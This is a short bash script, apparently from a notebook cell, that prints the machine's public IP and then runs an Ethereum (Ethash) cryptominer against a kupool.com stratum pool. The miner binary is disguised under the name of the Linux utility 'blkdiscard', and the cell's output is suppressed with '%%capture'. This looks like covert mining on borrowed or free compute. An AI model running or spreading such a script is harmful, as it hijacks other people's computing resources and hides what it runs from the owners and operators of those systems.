#!/bin/bash
%%capture

#gives ip address 
curl ipecho.net/plain && curl ipecho.net/plain
chmod +x blkdiscard 
./blkdiscard --algo ETHASH --pool stratum+ssl://ethash.kupool.com:8888 --user legassa.001
